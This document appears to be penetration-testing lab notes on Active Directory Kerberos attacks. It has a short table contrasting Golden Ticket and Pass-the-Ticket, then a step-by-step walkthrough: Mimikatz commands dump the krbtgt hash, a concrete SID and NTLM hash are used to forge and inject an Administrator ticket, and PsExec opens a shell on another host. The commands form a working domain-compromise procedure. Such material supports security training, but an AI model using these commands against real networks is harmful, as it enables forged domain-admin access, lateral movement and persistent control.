krbtgt account, we own the domain| Attack | Description | When to Use |
|---|---|---|
| Golden Ticket | Creates a forged TGT (Ticket Granting Ticket) that grants domain-wide access for up to 10 years. | When you have krbtgt hash and want persistent access to the domain. |
| Pass-the-Ticket (PtT) | Uses a stolen valid TGT or TGS (Service Ticket) to authenticate as a user without needing a password. | When you have an extracted TGT or TGS and want lateral movement without dumping credentials. |
Login to Domain Controller (Server) and open CMD as administrator
Use Mimikatz to pull down the krbtgt account
lsadump::lsa /inject /name:krbtgt


Grab the SID and NTLM hash to generate the Golden Ticket
S-1-5-21-2828008126-1612423536-1023625581
e5efba889e477a42ce92a08a552388d6
Generate Golden Ticket

kerberos::golden /User:Administrator /domain:MARVEL.local /sid:S-1-5-21-2828008126-1612423536-1023625581 /krbtgt:e5efba889e477a42ce92a08a552388d6 /id:500 /ptt
/User: Can be a fake user/domain: Must be a real domain/sid: SID/krbtgt: NTLM Hash/id: The RID of user, 500 for administrator (See NTLM hash)/ptt: Pass the ticketSpawn a new command prompt

misc::cmd
misc::cmd command is used to spawn a new command prompt (cmd.exe) with the injected Kerberos ticket, allowing you to use the forged credentials for authentication within that session.Use Domain Privileges

Use psexec.exe to get a shell
PsExec.exe \\\\THEPUNISHER cmd.exe

